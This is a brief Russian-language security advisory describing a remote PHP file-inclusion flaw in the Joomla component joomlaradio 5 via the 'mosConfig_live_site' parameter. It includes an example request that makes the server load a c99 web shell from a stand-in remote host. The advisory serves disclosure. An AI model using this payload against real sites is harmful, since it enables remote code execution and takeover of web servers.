Программа: Joomla Component joomlaradio 5

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «mosConfig_live_site» сценарием admin.joomlaradiov5.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

www.site.com/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php? mosConfig_live_site=http://scriptkiddie.com/c99haxor.txt?



Оставить мнение